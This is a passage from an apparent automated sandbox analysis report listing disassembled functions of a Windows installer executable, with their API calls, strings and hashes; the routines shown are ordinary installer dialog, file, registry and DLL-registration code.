                                                                                                    • Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68
                                                                                                    Function 00405479 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
                                                                                                    • ShowWindow.USER32(?), ref: 004054D2
                                                                                                    • DestroyWindow.USER32 ref: 004054E6
                                                                                                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
                                                                                                    • GetDlgItem.USER32(?,?), ref: 00405523
                                                                                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
                                                                                                    • IsWindowEnabled.USER32(00000000), ref: 0040553E
                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 004055ED
                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 004055F7
                                                                                                    • SetClassLongW.USER32(?,000000F2,?), ref: 00405611
                                                                                                    • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
                                                                                                    • GetDlgItem.USER32(?,00000003), ref: 00405708
                                                                                                    • ShowWindow.USER32(00000000,?), ref: 0040572A
                                                                                                    • EnableWindow.USER32(?,?), ref: 0040573C
                                                                                                    • EnableWindow.USER32(?,?), ref: 00405757
                                                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
                                                                                                    • EnableMenuItem.USER32(00000000), ref: 00405774
                                                                                                    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
                                                                                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
                                                                                                    • lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
                                                                                                    • SetWindowTextW.USER32(?,00447240), ref: 004057DC
                                                                                                    • ShowWindow.USER32(?,0000000A), ref: 00405910
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                    • String ID: @rD
                                                                                                    • API String ID: 184305955-3814967855
                                                                                                    • Opcode ID: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                                                                    • Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
                                                                                                    • Opcode Fuzzy Hash: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                                                                    • Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E
                                                                                                    Function 004040B8 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 00404181
                                                                                                    • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
                                                                                                    • GetSysColor.USER32(?), ref: 004041AF
                                                                                                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
                                                                                                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
                                                                                                    • lstrlenW.KERNEL32(?), ref: 004041D6
                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
                                                                                                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2
                                                                                                      • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
                                                                                                      • Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
                                                                                                      • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004
                                                                                                    • GetDlgItem.USER32(?,0000040A), ref: 0040424A
                                                                                                    • SendMessageW.USER32(00000000), ref: 00404251
                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 0040427E
                                                                                                    • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
                                                                                                    • SetCursor.USER32(00000000), ref: 004042D2
                                                                                                    • ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
                                                                                                    • SetCursor.USER32(00000000), ref: 004042F6
                                                                                                    • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
                                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                    • String ID: @%F$N$open
                                                                                                    • API String ID: 3928313111-3849437375
                                                                                                    • Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                                                    • Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
                                                                                                    • Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                                                    • Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99
                                                                                                    Function 00406A99 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 163filestringmemoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • lstrcpyW.KERNEL32(0045B2C8,NUL), ref: 00406AA9
                                                                                                    • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
                                                                                                    • GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1
                                                                                                      • Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                                                      • Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                                                    • GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
                                                                                                    • wsprintfA.USER32 ref: 00406B4D
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
                                                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
                                                                                                    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
                                                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
                                                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37
                                                                                                      • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                                      • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                                    • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00406C52
                                                                                                    • CloseHandle.KERNEL32(?), ref: 00406C5C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                    • String ID: F$%s=%s$NUL$[Rename]
                                                                                                    • API String ID: 565278875-1653569448
                                                                                                    • Opcode ID: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                                                                                    • Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
                                                                                                    • Opcode Fuzzy Hash: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                                                                                    • Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC
                                                                                                    Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                    • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                    • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                    • DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                    • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                    • EndPaint.USER32(?,?), ref: 00401177
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                    • String ID: F
                                                                                                    • API String ID: 941294808-1304234792
                                                                                                    • Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                                                                    • Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
                                                                                                    • Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                                                                    • Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4
                                                                                                    Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                    • lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                    • RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                    Strings
                                                                                                    • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                    • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                    • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                    • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                    • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                    • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                    • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                    • API String ID: 1641139501-220328614
                                                                                                    • Opcode ID: d79db666ee92a39b53e47641609ed565b43369f8775619f718224e07aa5483b4
                                                                                                    • Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
                                                                                                    • Opcode Fuzzy Hash: d79db666ee92a39b53e47641609ed565b43369f8775619f718224e07aa5483b4
                                                                                                    • Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59
                                                                                                    Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                    • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                    • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                    • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                    Strings
                                                                                                    • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                    • String ID: created uninstaller: %d, "%s"
                                                                                                    • API String ID: 3294113728-3145124454
                                                                                                    • Opcode ID: c666975226392a23a96cc8c7abb3eb5c8f7508c76e04a15e1ccd320165ca38cb
                                                                                                    • Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
                                                                                                    • Opcode Fuzzy Hash: c666975226392a23a96cc8c7abb3eb5c8f7508c76e04a15e1ccd320165ca38cb
                                                                                                    • Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98
                                                                                                    Function 004060E7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72filestringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                                                    • GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
                                                                                                    • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
                                                                                                    • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678), ref: 0040619B
                                                                                                    • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
                                                                                                    • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                    • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                    • API String ID: 3734993849-2769509956
                                                                                                    • Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                                                                    • Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
                                                                                                    • Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                                                                    • Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD
                                                                                                    Function 00403DCA Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
                                                                                                    • GetSysColor.USER32(00000000), ref: 00403E00
                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 00403E0C
                                                                                                    • SetBkMode.GDI32(?,?), ref: 00403E18
                                                                                                    • GetSysColor.USER32(?), ref: 00403E2B
                                                                                                    • SetBkColor.GDI32(?,?), ref: 00403E3B
                                                                                                    • DeleteObject.GDI32(?), ref: 00403E55
                                                                                                    • CreateBrushIndirect.GDI32(?), ref: 00403E5F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2320649405-0
                                                                                                    • Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                                                    • Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
                                                                                                    • Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                                                    • Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94
                                                                                                    Function 004023F0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 83libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                      • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                                                                                                      • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                    • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                    • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                    Strings
                                                                                                    • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                    • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                    • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                    • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
                                                                                                    • API String ID: 1033533793-945480824
                                                                                                    • Opcode ID: aebbfb54fe117075fb91935afd2b3d42be9cb3525beaf419298f1839c78bdf39
                                                                                                    • Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
                                                                                                    • Opcode Fuzzy Hash: aebbfb54fe117075fb91935afd2b3d42be9cb3525beaf419298f1839c78bdf39
                                                                                                    • Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D
                                                                                                    Function 00404F72 Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                    • lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                    • lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
